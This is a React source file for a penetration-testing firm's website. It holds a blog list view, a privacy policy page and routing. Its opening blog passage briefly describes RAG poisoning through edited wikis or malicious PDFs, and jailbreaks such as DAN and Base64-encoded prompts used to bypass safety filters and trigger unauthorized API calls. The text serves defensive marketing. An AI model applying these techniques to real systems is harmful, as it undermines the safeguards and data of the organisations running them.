              <h4 className="font-bold text-sm uppercase tracking-wider text-[#00FF94]">Attack Vector Analysis</h4>
              <p className="text-xs text-slate-400 leading-relaxed italic">Analysis of enterprise AI breach attempts shows a significant leaning towards indirect prompt injection and RAG hijacking.</p>
              <img
                src="/assets/blog/llm_security.png"
                alt="LLM Security Shield"
                className="w-full h-auto rounded-sm border border-white/10"
              />
            </div>
          </div>

          <h3 className="text-2xl font-bold text-white mt-12">The RAG Poisoning Vector</h3>
          <p>Retrieval-Augmented Generation (RAG) is the industry standard for LLM knowledge. However, if an attacker can "poison" the data source—either by editing a wiki or uploading a malicious PDF—the LLM will treat that poison as "Ground Truth" and act upon it, often creating a massive security hole.</p>

          <div className="bg-red-500/5 border border-red-500/20 p-6 rounded-sm">
            <h4 className="text-red-400 font-bold mb-2 inline-flex items-center gap-2">
              <ShieldAlert size={16} /> ATTACK_VECTOR: Jailbreaking & Sandbox Escape
            </h4>
            <p className="text-sm text-slate-400">We simulate adversarial "jailbreaking" attempts (DAN, Base64-encoded prompts) to bypass safety filters and attempt to trigger unauthorized API calls or exfiltrate training data weights via model inversion attacks.</p>
          </div>

          <h3 className="text-2xl font-bold text-white mt-12">Total System Security</h3>
          <p>Our approach at Cyberent³ involves securing the entire AI pipeline: from input filtering and output monitoring to hardware-level sandboxing. Treat LLM output as untrusted execution code until proven otherwise.</p>

          <div className="mt-8 p-4 bg-white/5 border-l-4 border-[#00FF94] flex gap-4 items-center">
            <AlertTriangle className="text-[#00FF94]" size={24} />
            <p className="text-sm italic">"If your AI has access to your database, it has access to your vulnerabilities."</p>
          </div>
        </div>
      )
    }
  ];

  const currentPost = blogPosts.find(p => p.id === selectedPost);

  return (
    <div className="min-h-screen bg-[#050505] text-white selection:bg-[#00FF94]/30 selection:text-[#00FF94]">
      <nav className="border-b border-white/5 bg-[#050505]/80 backdrop-blur-xl sticky top-0 z-50">
        <div className="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8 h-20 flex items-center justify-between">
          <div className="flex items-center cursor-pointer" onClick={() => navigate("/")}>
            <CyberentLogo width={140} height={40} />
          </div>
          <div className="flex items-center gap-4">
            {selectedPost && (
              <button
                onClick={() => setSelectedPost(null)}
                className="text-slate-400 hover:text-white transition-colors flex items-center gap-2 text-sm uppercase tracking-wider font-mono"
              >
                <ArrowRight size={14} className="rotate-180" /> Back to logs
              </button>
            )}
            <button
              onClick={() => navigate("/")}
              className="text-slate-400 hover:text-white transition-colors p-2"
            >
              <Home size={20} />
            </button>
          </div>
        </div>
      </nav>

      <main className="max-w-7xl mx-auto px-4 py-20">
        {!selectedPost ? (
          /* Blog Multi-Grid */
          <div className="animate-fade-in-up">
            <div className="mb-16">
              <div className="flex items-center gap-3 mb-4">
                <div className="w-12 h-[2px] bg-[#00FF94]" />
                <span className="text-sm font-mono text-[#00FF94] uppercase tracking-widest">Technical Logs</span>
              </div>
              <h1 className="text-4xl md:text-5xl font-bold mb-4">Penetration Testing <br /><span className="text-slate-500">Blog & Resources</span></h1>
              <p className="text-slate-400 max-w-2xl text-lg leading-relaxed">
                In-depth analysis, case studies, and methodologies from the front lines of offensive security.
              </p>
            </div>

            <div className="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-3 gap-8">
              {blogPosts.map((post, index) => (
                <div
                  key={post.id}
                  className="card-cyber p-8 group cursor-pointer"
                  style={{ animationDelay: `${index * 150}ms` }}
                  onClick={() => setSelectedPost(post.id)}
                >
                  <div className="flex justify-between items-center mb-6">
                    <span className="text-[10px] font-mono text-[#00FF94] px-2 py-1 bg-[#00FF94]/5 border border-[#00FF94]/20 uppercase">
                      {post.category}
                    </span>
                    <span className="text-[10px] font-mono text-slate-500">{post.readTime}</span>
                  </div>
                  <h3 className="text-xl font-bold mb-4 group-hover:text-[#00FF94] transition-colors leading-tight">
                    {post.title}
                  </h3>
                  <p className="text-slate-400 text-sm mb-6 leading-relaxed">
                    {post.excerpt}
                  </p>
                  <div className="pt-6 border-t border-white/10 flex items-center justify-between">
                    <span className="text-xs text-slate-500 font-mono">{post.date}</span>
                    <span className="text-[#00FF94] text-xs font-mono group-hover:translate-x-1 transition-transform inline-flex items-center gap-2">
                      READ_LOG <ArrowRight size={14} />
                    </span>
                  </div>
                </div>
              ))}
            </div>
          </div>
        ) : (
          /* Individual Blog Post View */
          <div className="max-w-3xl mx-auto animate-fade-in-up">
            <div className="mb-12">
              <div className="flex items-center gap-3 mb-6">
                <span className="text-xs font-mono text-[#00FF94] border border-[#00FF94]/30 px-3 py-1 bg-[#00FF94]/5 uppercase">
                  {currentPost.category}
                </span>
                <span className="text-xs font-mono text-slate-500">{currentPost.date} • {currentPost.readTime}</span>
              </div>
              <h1 className="text-4xl md:text-5xl font-bold mb-8 leading-tight">{currentPost.title}</h1>
              <div className="flex items-center gap-4 py-6 border-y border-white/5">
                <div className="w-10 h-10 bg-[#00FF94]/20 rounded-full flex items-center justify-center border border-[#00FF94]/40">
                  <Fingerprint className="text-[#00FF94] w-5 h-5" />
                </div>
                <div>
                  <p className="text-sm font-bold">Cyberent³ Intel Team</p>
                  <p className="text-xs text-slate-500">Security Research Division</p>
                </div>
              </div>
            </div>

            <div className="prose prose-invert prose-slate max-w-none text-slate-300 leading-relaxed text-lg">
              {currentPost.content}
            </div>

            <div className="mt-20 pt-12 border-t border-white/10 text-center">
              <p className="text-slate-500 mb-6 font-mono text-sm underline decoration-[#00FF94]/30 underline-offset-8 uppercase tracking-widest">End of technical log</p>
              <button
                onClick={() => setSelectedPost(null)}
                className="btn-outline text-sm"
              >
                Back to all technical resources
              </button>
            </div>
          </div>
        )}

        {/* Newsletter / CTA */}
        {!selectedPost && (
          <div className="mt-32 p-12 bg-white/[0.02] border border-white/5 relative overflow-hidden text-center rounded-sm">
            <div className="absolute top-0 left-0 w-full h-[1px] bg-gradient-to-r from-transparent via-[#00FF94]/50 to-transparent" />
            <h2 className="text-2xl font-bold mb-4">Stay ahead of emerging threats.</h2>
            <p className="text-slate-400 mb-8 max-w-xl mx-auto">
              Subscribe to our technical briefing for the latest vulnerabilities and security advisories.
            </p>
            <div className="flex max-w-md mx-auto gap-2">
              <input
                type="email"
                placeholder="operator@enterprise.com"
                className="input-cyber flex-grow"
              />
              <button className="btn-cyber whitespace-nowrap">Subscribe</button>
            </div>
          </div>
        )}
      </main>

      <Footer />
    </div>
  );
};

const PrivacyPolicyPage = () => {
  const navigate = useNavigate();

  return (
    <div className="min-h-screen bg-[#050505] text-white selection:bg-[#00FF94]/30 selection:text-[#00FF94]">
      {/* Mini Nav */}
      <nav className="border-b border-white/5 bg-[#050505]/80 backdrop-blur-xl sticky top-0 z-50">
        <div className="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8 h-20 flex items-center justify-between">
          <div className="flex items-center cursor-pointer" onClick={() => navigate("/")}>
            <CyberentLogo width={140} height={40} />
          </div>
          <button
            onClick={() => navigate("/")}
            className="text-slate-400 hover:text-white transition-colors p-2"
          >
            <Home size={20} />
          </button>
        </div>
      </nav>

      <main className="max-w-4xl mx-auto px-4 py-20 animate-fade-in-up">
        <div className="mb-12">
          <div className="flex items-center gap-3 mb-4">
            <div className="w-12 h-[2px] bg-[#00FF94]" />
            <span className="text-sm font-mono text-[#00FF94] uppercase tracking-widest">Legal Document</span>
          </div>
          <h1 className="text-[#00FF94]xl md:text-5xl font-bold mb-4">Privacy Policy</h1>
          <p className="text-slate-500 font-mono text-xs">LAST_MODIFIED: {new Date().toLocaleDateString()}</p>
        </div>

        <div className="space-y-12 text-slate-400 leading-relaxed">
          <section>
            <h2 className="text-xl font-bold text-white mb-4 flex items-center gap-3">
              <span className="text-[#00FF94] font-mono text-sm">01</span> Data Collection
            </h2>
            <p>
              Cyberent³ collects minimal data necessary to provide elite security services. This includes information provided through our contact form such as your name, corporate email, and service requirements. We do not use third-party tracking cookies.
            </p>
          </section>

          <section>
            <h2 className="text-xl font-bold text-white mb-4 flex items-center gap-3">
              <span className="text-[#00FF94] font-mono text-sm">02</span> Data Usage
            </h2>
            <p>
              All data transmitted to Cyberent³ is used exclusively for project scoping, secure communication, and service delivery. We utilize end-to-end encryption for all sensitive technical reports and findings.
            </p>
          </section>

          <section>
            <h2 className="text-xl font-bold text-white mb-4 flex items-center gap-3">
              <span className="text-[#00FF94] font-mono text-sm">03</span> Confidentiality
            </h2>
            <p>
              As a security firm, confidentiality is our core protocol. We never share client engagement details, vulnerability data, or identifying information with third parties unless explicitly required by law or authorized in writing by the client.
            </p>
          </section>

          <section>
            <h2 className="text-xl font-bold text-white mb-4 flex items-center gap-3">
              <span className="text-[#00FF94] font-mono text-sm">04</span> Security Measures
            </h2>
            <p>
              All internal systems are protected by zero-trust architecture. Cloudflare Turnstile is utilized to prevent automated exploitation of our communication channels.
            </p>
          </section>
        </div>
      </main>

      <Footer />
    </div>
  );
};

// Home Page Component
const HomePage = () => {
  const { state } = useLocation();

  useEffect(() => {
    if (state?.scrollTo) {
      const element = document.getElementById(state.scrollTo);
      if (element) {
        setTimeout(() => {
          element.scrollIntoView({ behavior: "smooth" });
        }, 100);
      }
      // Clear state after scrolling
      window.history.replaceState({}, document.title);
    }
  }, [state]);

  return (
    <>
      <Navigation />
      <HeroSection />
      <CertificationSection />
      <AboutSection />
      <MissionSection />
      <ServicesSection />
      <VaptPhasesSection />
      <ComplianceSection />
      <IndustriesSection />
      <TestimonialsSection />
      <ContactSection />
      <ToolsExpertiseSection />
      <Footer />
      <SSLBadge />
    </>
  );
};

// Main App Component
function App() {
  return (
    <div className="App">
      <Toaster
        position="top-right"
        toastOptions={{
          style: {
            background: "#0A0A0A",
            border: "1px solid rgba(255, 255, 255, 0.1)",
            color: "#FFFFFF",
          },
        }}
      />
      <BrowserRouter>
        <LoadingBar />
        <Routes>
          <Route path="/" element={<HomePage />} />
          <Route path="/blog" element={<BlogPage />} />
          <Route path="/privacy" element={<PrivacyPolicyPage />} />
          <Route path="/404" element={<NotFoundPage />} />
          <Route path="/403" element={<ForbiddenPage />} />
          <Route path="/500" element={<ServerErrorPage />} />
          <Route path="/offline" element={<OfflinePage />} />
          <Route path="*" element={<NotFoundPage />} />
        </Routes>
      </BrowserRouter>
    </div>
  );
}

export default App;
